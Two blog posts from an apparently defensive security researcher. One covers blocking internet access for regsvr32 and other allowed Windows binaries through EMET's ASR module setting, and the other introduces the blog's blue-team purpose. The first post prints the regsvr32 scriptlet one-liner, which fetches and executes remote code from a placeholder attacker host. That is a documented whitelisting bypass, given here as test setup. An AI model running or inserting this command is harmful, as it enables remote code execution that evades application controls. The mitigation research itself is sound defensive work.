Tuesday, September 27, 2016

Should that app use the internet?

One of the inspirations for this blog has been sharing my research into mitigating different types of malware and the activity that can bypass mitigations to perform undesired functions. One body of work that really caught my interest is that published by Casey Smith (@subTee), particularly his use of obscure functions in allowed applications to download code from the internet and execute it. For an example, see http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html.

I decided to take a stab at this. My first attempt was to use a technology I was familiar with to see if I could prevent these applications from using the internet to download code. I knew that the ASR mitigation in EMET could limit an application's access to DLLs, and based on other ASR work I had done I suspected that a DLL was used at some point in the network transaction, so I started pursuing this path. A coworker was able to set up a web server hosting a customized version of subTee's regsvr32 download payload. Armed with a working example and Process Monitor (https://technet.microsoft.com/en-us/sysinternals/processmonitor.aspx) with a filter to show DLL loads, I went to work.
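For anyone who wants to reproduce the test setup: the published technique abuses regsvr32's ability to pull an "install" scriptlet over HTTP. The one-liner below is the commonly documented form; the server name and payload path are placeholders, not what we used.

```shell
:: Fetches an .sct COM scriptlet over HTTP and executes the JScript inside it,
:: without writing an executable to disk or requiring admin rights.
regsvr32.exe /s /n /u /i:http://attacker.example/payload.sct scrobj.dll
```

As I understand the flags: /s is silent, /n skips DllRegisterServer, /i passes the URL to DllInstall (hosted by scrobj.dll), and /u runs the uninstall path so nothing actually gets registered.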

After a little work I was able to narrow it down to two DLLs that I thought would work. Previous examples on Twitter targeted the DLL from the example but were easily bypassed (https://twitter.com/thechrisharrod/status/725713658848882688) because the one DLL they blocked was not required for the download to execute. After some digging with Process Monitor I found that the two best candidates were winhttp.dll and webio.dll. I don't know a whole lot about the DLLs themselves, but my theory is that winhttp.dll is used to gather any proxy server settings (something I learned from my time managing a proxy server) and webio.dll is used to make the actual web calls. With either of these blocked by ASR, EMET prevented regsvr32 and other applications from using the internet. WinHTTP appeared to produce the best logging with the EMET blocks, so I targeted that, and it worked!
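For reference, the ASR module list can be scripted as well as set through the GUI. If I recall the EMET 5.5 user guide correctly, EMET_Conf.exe accepts an asr_modules list per application, so something like the line below should reproduce the block. Treat the exact syntax as an assumption from memory and verify it against your EMET version's documentation.

```shell
:: Enable ASR on regsvr32 and refuse to load the DLLs the download path needs.
:: Blocking either winhttp.dll or webio.dll was enough in my testing.
EMET_Conf.exe --set "C:\Windows\System32\regsvr32.exe" +ASR asr_modules:winhttp.dll;webio.dll
```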

I began testing the mitigation on a few apps that had documented bypasses using the internet, apps I thought had no business using it. After only a few hours of testing I knew that, while effective, this was not going to work at scale. Simply put, several of these applications were using these DLLs for internal network communications as well as for legitimate internet activity (who knew rundll32 was used to check OCSP?). My goal was to limit these apps, but also to grow into things more likely to use the internet like PowerShell, cscript, wscript, and mshtml. I had a tool that was effective, but it wasn't granular enough to allow some approved access and block the rest; it was strictly on or off.

So I was back to the drawing board, with a network on/off switch in my back pocket. After a few more weeks of work and thinking I found something that has potential, but I am out of time for now... so I plan to address it in my next post. Maybe at some point in the future this will come in handy; only time will tell. I will also see if I can get a video demonstrating the EMET mitigation posted at some point.

Until then, work hard and spend time with your family.

Branden
@limpidweb

Tuesday, September 13, 2016

Hello World

One of the tasks I get to perform at work is to research and study malware and find ways to mitigate it and minimize the damage it can do. I am tasked with assessing our defenses and, where necessary, providing additional layers for my organization to block malicious activity on workstations or servers without getting in the way of legitimate work.

I have been in several organizations where pen testers had already demonstrated that they could send attachments or get people to click links to executable files that would bypass traditional defenses such as IPS, email filtering, URL filtering, sandboxing, and anti-virus. After that they were a command away from downloading .exe, .js, .dll, .reg, or a host of other persistence mechanisms, free to do their work through covert C2 channels. Malware blasted at us through spam campaigns or delivered through exploit kits behaved similarly.

I have worked on traditional defense mechanisms for several years. I have a networking background and have spent a considerable amount of time trying to win this battle from the network infrastructure side, but I frequently bump up against the limitations of trying to write policies that can effectively block this kind of activity. Don't get me wrong: I believe IPS, firewalls, URL filters, and the like are important defense mechanisms that can effectively block many off-the-shelf attacks. But if something was targeted, or just happened to fall within the range of addresses I had to allow out from my workstations, I frequently found myself unable to write a policy granular enough to stop it. Firewall/IPS/proxy vendors have been working to fix this, but they haven't cured the problem yet. A lot of malicious activity is simply well behaved at the network layer. On top of that, things like custom encryption, new ciphers, and psychedelic obfuscation were limiting the effectiveness of the policies I did have, and even updates several times a day weren't fast enough to keep up with the latest attacks.

Over time I have realized that winning the security battle is going to have to take place, in large part, on the endpoints. Managing a worm outbreak in my environment exposed me to the power of endpoint-enforced policies. For a while, only allowing pre-defined applications to run proved to be a big help, and I became convinced that this would be one of the most effective ways of preventing malicious activity. The next big thing for me was anti-exploit, and I dove into tools like Microsoft EMET. These are all still very effective, but attackers' adoption of PowerShell sails right through many of the mitigations I had in place, and folks like Casey Smith are finding all sorts of ways to skirt the limitations of these technologies.

My purpose with this blog is to explore the different mitigations I find (if any) to address these issues. I like to share my work (where I can) with the intent of helping the blue team and contributing back to the security industry. Sometimes my posts will be partial or a work in progress. Sometimes they will just lament how a mitigation didn't work. Sometimes they will be about random things that seem cool at the time. Maybe the purpose will grow or change over time. Hopefully I can keep it coherent and the blue team finds it useful.

-Branden
@limpidweb